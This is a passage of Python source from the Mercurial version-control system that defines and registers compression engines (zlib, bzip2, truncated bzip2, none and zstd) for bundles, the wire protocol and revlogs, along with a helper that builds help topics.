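# are hypothetical, not part of Mercurial): only ``name()`` is mandatory; the
# other methods declare optional capabilities.
#
#   class _identityengine(compressionengine):
#       def name(self):
#           return 'identity'
#
#       def compressstream(self, it, opts=None):
#           return it
#
#       def decompressorreader(self, fh):
#           return fh
#
#   compengines.register(_identityengine())
#
# With no ``bundletype()``, ``wireprotosupport()``, or ``revlogheader()``
# declared, such an engine is only reachable via ``compengines['identity']``.
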
class _zlibengine(compressionengine):
    def name(self):
        return 'zlib'

    def bundletype(self):
        """zlib compression using the DEFLATE algorithm.

        All Mercurial clients should support this format. The compression
        algorithm strikes a reasonable balance between compression ratio
        and size.
        """
        return 'gzip', 'GZ'

    def wireprotosupport(self):
        return compewireprotosupport('zlib', 20, 20)

    def revlogheader(self):
        return 'x'

    def compressstream(self, it, opts=None):
        opts = opts or {}

        z = zlib.compressobj(opts.get('level', -1))
        for chunk in it:
            data = z.compress(chunk)
            # Not all calls to compress emit data. It is cheaper to inspect
            # here than to feed empty chunks through the generator.
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        def gen():
            d = zlib.decompressobj()
            for chunk in filechunkiter(fh):
                while chunk:
                    # Limit output size to limit memory.
                    yield d.decompress(chunk, 2 ** 18)
                    chunk = d.unconsumed_tail

        return chunkbuffer(gen())

    class zlibrevlogcompressor(object):
        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 44:
                return None

            elif insize <= 1000000:
                compressed = zlib.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None

            # zlib makes an internal copy of the input buffer, doubling
            # memory usage for large inputs. So do streaming compression
            # on large inputs.
            else:
                z = zlib.compressobj()
                parts = []
                pos = 0
                while pos < insize:
                    pos2 = pos + 2**20
                    parts.append(z.compress(data[pos:pos2]))
                    pos = pos2
                parts.append(z.flush())

                if sum(map(len, parts)) < insize:
                    return ''.join(parts)
                return None

        def decompress(self, data):
            try:
                return zlib.decompress(data)
            except zlib.error as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        str(e))

    def revlogcompressor(self, opts=None):
        return self.zlibrevlogcompressor()

compengines.register(_zlibengine())

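# A round-trip sketch for the engine above, using stdlib ``io`` plus the
# ``chunkbuffer`` helper defined elsewhere in this file (which supplies the
# ``read(size)`` method on the returned reader):
#
#   import io
#   engine = compengines['zlib']
#   compressed = ''.join(engine.compressstream(iter(['some ', 'data'])))
#   reader = engine.decompressorreader(io.BytesIO(compressed))
#   assert reader.read(1024) == 'some data'
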
class _bz2engine(compressionengine):
    def name(self):
        return 'bz2'

    def bundletype(self):
        """An algorithm that produces smaller bundles than ``gzip``.

        All Mercurial clients should support this format.

        This engine will likely produce smaller bundles than ``gzip`` but
        will be significantly slower, both during compression and
        decompression.

        If available, the ``zstd`` engine can yield similar or better
        compression at much higher speeds.
        """
        return 'bzip2', 'BZ'

    # We declare a protocol name but don't advertise by default because
    # it is slow.
    def wireprotosupport(self):
        return compewireprotosupport('bzip2', 0, 0)

    def compressstream(self, it, opts=None):
        opts = opts or {}
        z = bz2.BZ2Compressor(opts.get('level', 9))
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        def gen():
            d = bz2.BZ2Decompressor()
            for chunk in filechunkiter(fh):
                yield d.decompress(chunk)

        return chunkbuffer(gen())

compengines.register(_bz2engine())

class _truncatedbz2engine(compressionengine):
    def name(self):
        return 'bz2truncated'

    def bundletype(self):
        return None, '_truncatedBZ'

    # We don't implement compressstream because it is hackily handled
    # elsewhere.

    def decompressorreader(self, fh):
        def gen():
            # The input stream doesn't have the 'BZ' header. So add it back.
            d = bz2.BZ2Decompressor()
            d.decompress('BZ')
            for chunk in filechunkiter(fh):
                yield d.decompress(chunk)

        return chunkbuffer(gen())

compengines.register(_truncatedbz2engine())

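# Why priming the decompressor with 'BZ' works, as a sketch: the truncated
# stream is an ordinary bz2 stream with its two-byte magic removed, so
# feeding the magic first restores a well-formed stream:
#
#   import bz2
#   full = bz2.compress('payload')     # begins with the 'BZ' magic
#   d = bz2.BZ2Decompressor()
#   d.decompress('BZ')                 # yields '' but primes the state
#   assert d.decompress(full[2:]) == 'payload'
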
class _noopengine(compressionengine):
    def name(self):
        return 'none'

    def bundletype(self):
        """No compression is performed.

        Use this compression engine to explicitly disable compression.
        """
        return 'none', 'UN'

    # Clients always support uncompressed payloads. Servers don't advertise
    # them by default because, unless you are on a fast network, uncompressed
    # payloads can easily saturate the network pipe.
    def wireprotosupport(self):
        return compewireprotosupport('none', 0, 10)

    # We don't implement revlogheader because it is handled specially
    # in the revlog class.

    def compressstream(self, it, opts=None):
        return it

    def decompressorreader(self, fh):
        return fh

    class nooprevlogcompressor(object):
        def compress(self, data):
            return None

    def revlogcompressor(self, opts=None):
        return self.nooprevlogcompressor()

compengines.register(_noopengine())

class _zstdengine(compressionengine):
    def name(self):
        return 'zstd'

    @propertycache
    def _module(self):
        # Not all installs have the zstd module available. So defer importing
        # until first access.
        try:
            from . import zstd
            # Force delayed import.
            zstd.__version__
            return zstd
        except ImportError:
            return None

    def available(self):
        return bool(self._module)

    def bundletype(self):
        """A modern compression algorithm that is fast and highly flexible.

        Only supported by Mercurial 4.1 and newer clients.

        With the default settings, zstd compression is both faster and yields
        better compression than ``gzip``. It also frequently yields better
        compression than ``bzip2`` while operating at much higher speeds.

        If this engine is available and backwards compatibility is not a
        concern, it is likely the best available engine.
        """
        return 'zstd', 'ZS'

    def wireprotosupport(self):
        return compewireprotosupport('zstd', 50, 50)

    def revlogheader(self):
        return '\x28'

    def compressstream(self, it, opts=None):
        opts = opts or {}
        # zstd level 3 is almost always significantly faster than zlib
        # while providing no worse compression. It strikes a good balance
        # between speed and compression.
        level = opts.get('level', 3)

        zstd = self._module
        z = zstd.ZstdCompressor(level=level).compressobj()
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        zstd = self._module
        dctx = zstd.ZstdDecompressor()
        return chunkbuffer(dctx.read_from(fh))

    class zstdrevlogcompressor(object):
        def __init__(self, zstd, level=3):
            # Writing the content size adds a few bytes to the output.
            # However, it allows decompression to be more optimal since we
            # can pre-allocate a buffer to hold the result.
            self._cctx = zstd.ZstdCompressor(level=level,
                                             write_content_size=True)
            self._dctx = zstd.ZstdDecompressor()
            self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
            self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE

        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 50:
                return None

            elif insize <= 1000000:
                compressed = self._cctx.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None
            else:
                z = self._cctx.compressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._compinsize
                    chunk = z.compress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                chunks.append(z.flush())

                if sum(map(len, chunks)) < insize:
                    return ''.join(chunks)
                return None

        def decompress(self, data):
            insize = len(data)

            try:
                # This was measured to be faster than other streaming
                # decompressors.
                dobj = self._dctx.decompressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._decompinsize
                    chunk = dobj.decompress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                # Frame should be exhausted, so no finish() API.

                return ''.join(chunks)
            except Exception as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        str(e))

    def revlogcompressor(self, opts=None):
        opts = opts or {}
        return self.zstdrevlogcompressor(self._module,
                                         level=opts.get('level', 3))

compengines.register(_zstdengine())

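# With all of the engines above registered, wire protocol ordering follows
# the declared priorities (zstd 50, zlib 20, bzip2 and none 0), with ties
# broken alphabetically -- a sketch, assuming the zstd C module is importable:
#
#   >>> [e.name() for e in compengines.supportedwireengines(SERVERROLE)]
#   ['zstd', 'zlib', 'bzip2', 'none']
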
def bundlecompressiontopics():
    """Obtains a dict of available bundle compressions for use in help."""
    # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
    items = {}

    # We need to format the docstring. So use a dummy object/type to hold it
    # rather than mutating the original.
    class docobject(object):
        pass

    for name in compengines:
        engine = compengines[name]

        if not engine.available():
            continue

        bt = engine.bundletype()
        if not bt or not bt[0]:
            continue

        doc = pycompat.sysstr('``%s``\n    %s') % (
            bt[0], engine.bundletype.__doc__)

        value = docobject()
        value.__doc__ = doc
        value._origdoc = engine.bundletype.__doc__
        value._origfunc = engine.bundletype

        items[bt[0]] = value

    return items

i18nfunctions = bundlecompressiontopics().values()

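# A sketch of the resulting help items, assuming the zstd engine is
# available; only engines that are loadable and declare an external bundle
# name appear:
#
#   >>> topics = bundlecompressiontopics()
#   >>> sorted(topics)
#   ['bzip2', 'gzip', 'none', 'zstd']
#   >>> topics['gzip'].__doc__.splitlines()[0]
#   '``gzip``'
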
# convenient shortcut
dst = debugstacktrace